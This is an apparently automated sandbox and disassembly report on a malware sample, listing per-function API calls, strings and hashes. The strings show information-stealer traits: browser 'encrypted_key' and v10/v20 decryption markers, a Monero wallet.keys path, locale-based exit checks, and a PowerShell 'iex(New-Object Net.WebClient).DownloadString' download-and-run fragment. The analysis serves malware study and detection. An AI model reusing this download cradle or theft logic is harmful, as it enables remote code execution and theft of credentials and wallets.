Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 1b80dfac29b16384493c81f90c53aca8275bd2e1b7f0967a388ecac965a69f98
Instruction ID: 778c4fb875b9a47f5d4da3800fb0a3d22d45485a4ea57fffd207e1eed7bcf491
Opcode Fuzzy Hash: 1b80dfac29b16384493c81f90c53aca8275bd2e1b7f0967a388ecac965a69f98
Instruction Fuzzy Hash: A7C1C4B59011089BCB58FFA0DC89FEA737ABF55300F10459DE50AA7241EB30AE85CF95

Function 006A4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcat.KERNEL32(?,00000000), ref: 006A42EC
lstrcat.KERNEL32(?,0135E338), ref: 006A430B
lstrcat.KERNEL32(?,?), ref: 006A431F
lstrcat.KERNEL32(?,0135D2C0), ref: 006A4333

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006A8D90: GetFileAttributesA.KERNEL32(00000000,?,00691B54,?,?,006B564C,?,?,006B0E1F), ref: 006A8D9F

Part of subcall function 00699CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00699D39

Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A

Part of subcall function 006A93C0: GlobalAlloc.KERNEL32(00000000,006A43DD,006A43DD), ref: 006A93D3

StrStrA.SHLWAPI(?,0135E410), ref: 006A43F3
GlobalFree.KERNEL32(?), ref: 006A4512

Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699AEF
Part of subcall function 00699AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00694EEE,00000000,?), ref: 00699B01
Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699B2A
Part of subcall function 00699AC0: LocalFree.KERNEL32(?,?,?,?,00694EEE,00000000,?), ref: 00699B3F

lstrcat.KERNEL32(?,00000000), ref: 006A44A3
StrCmpCA.SHLWAPI(?,006B08D1), ref: 006A44C0
lstrcat.KERNEL32(00000000,00000000), ref: 006A44D2
lstrcat.KERNEL32(00000000,?), ref: 006A44E5
lstrcat.KERNEL32(00000000,006B0FB8), ref: 006A44F4

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: 59c5a72d420d48c8272b49f8a3afcd6fce77df029806dfb1321bb2bb32b91038
Instruction ID: 4c0eff81159c6811355e95d2f023beae17faeaafe5de3b3e54fc79d18bff51ee
Opcode Fuzzy Hash: 59c5a72d420d48c8272b49f8a3afcd6fce77df029806dfb1321bb2bb32b91038
Instruction Fuzzy Hash: 117160B6900208ABCB54FBE4DC85FEE73BABB89300F00459DE60597181EA74DB45CFA5

Function 006A6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 006A6774
ExitProcess.KERNEL32 ref: 006A67A5
ExitProcess.KERNEL32 ref: 006A67AF
ExitProcess.KERNEL32 ref: 006A67B9
ExitProcess.KERNEL32 ref: 006A67C3
ExitProcess.KERNEL32 ref: 006A67CD

Strings

*, xrefs: 006A678C

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: fa14b9605d1e332205a09ecced430a85ea78df1f626f8d044f9631b30f79a2dc
Instruction ID: 59ace504558743facb5b9ba6c8a39549be4d1dcc0d0d66870b89d16c60f8caa0
Opcode Fuzzy Hash: fa14b9605d1e332205a09ecced430a85ea78df1f626f8d044f9631b30f79a2dc
Instruction Fuzzy Hash: 86F05E3091520DEFD348AFE0E90976C7BB0FB05703F28029AF64986390DA708B41DF96

Function 006A92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(:j,80000000,00000003,00000000,00000003,00000080,00000000,?,006A3AEE,?), ref: 006A92FC
GetFileSizeEx.KERNEL32(000000FF,:j), ref: 006A9319
CloseHandle.KERNEL32(000000FF), ref: 006A9327

Strings

:j, xrefs: 006A9311, 006A933D, 006A9314
:j, xrefs: 006A92F8, 006A92FB

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: :j$:j
API String ID: 1378416451-347553651
Opcode ID: f14f4b465b63443dbfa492e9c63d0989d4fdb5415f319714bdcf1792122d6816
Instruction ID: eed8ce2e51409e7d854d9e29382bb14c7c08169a2e68e806ad6ffcf711911981
Opcode Fuzzy Hash: f14f4b465b63443dbfa492e9c63d0989d4fdb5415f319714bdcf1792122d6816
Instruction Fuzzy Hash: F9F03C35E40208BBDF14EBB0DC49B9E77FABB49711F20C294B651A72C0DA719A018F50

Function 006AC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

memset.MSVCRT ref: 006AC8BF
___crtGetStringTypeA.LIBCMT ref: 006AC8EC
___crtLCMapStringA.LIBCMT ref: 006AC90C
___crtLCMapStringA.LIBCMT ref: 006AC931

Strings

, xrefs: 006AC896

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Typememset
String ID:
API String ID: 3530896902-3916222277
Opcode ID: 725f25dabd97b02cda98d3caebb01578d077a1814d3004173a097b5ec3aebc1b
Instruction ID: 21ead1e800f68001d8c493ad71872ab533930bddedc4632009c12ebf504aaf32
Opcode Fuzzy Hash: 725f25dabd97b02cda98d3caebb01578d077a1814d3004173a097b5ec3aebc1b
Instruction Fuzzy Hash: CE4116B110079C9EDB219B248C84FFBBBEAAB46714F1444ECE98A86182D2719E45DF24

Function 006A2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

ShellExecuteEx.SHELL32(0000003C), ref: 006A2D85

Strings

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 006A2D04
')", xrefs: 006A2CB3
<, xrefs: 006A2D39
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 006A2CC4

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: a5062ac8c867b54bb3f7fc3dd26bf6a9dfbc17e5f24e3540ab8f96a183ec5422
Instruction ID: b6a478bae377998d061eb281bb9a49fa8a93ab58f9926382d4f58b8b806fbbfa
Opcode Fuzzy Hash: a5062ac8c867b54bb3f7fc3dd26bf6a9dfbc17e5f24e3540ab8f96a183ec5422
Instruction Fuzzy Hash: 4641DE71D102089ADB94FFE0C891BEEBB76AF15300F50411EE106A7192DF746E8ACF95

Function 00699E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00699F41

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Strings

v20, xrefs: 00699E21
v10, xrefs: 00699EA3
@, xrefs: 00699EF1
ERROR_RUN_EXTRACTOR, xrefs: 00699E67

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: ca477e8b95a9879bab34563f1851a18d134e66af194513c00fa0f5f9dbb97abc
Instruction ID: d3a7c1807bbe25f182cade4828ef6f22c186b560101fd20fe590447612331b74
Opcode Fuzzy Hash: ca477e8b95a9879bab34563f1851a18d134e66af194513c00fa0f5f9dbb97abc
Instruction Fuzzy Hash: FF615170A00208ABDF54EFA4CC95FEE77BAAF45304F008118F90A9F581DB746E45CB96

Function 006A9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0135E0F8,?,?,?,006A140C,?,0135E0F8,00000000), ref: 006A926C
lstrcpyn.KERNEL32(008DAB88,0135E0F8,0135E0F8,?,006A140C,?,0135E0F8), ref: 006A9290
lstrlen.KERNEL32(?,?,006A140C,?,0135E0F8), ref: 006A92A7
wsprintfA.USER32 ref: 006A92C7

Strings

%s%s, xrefs: 006A92B5

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

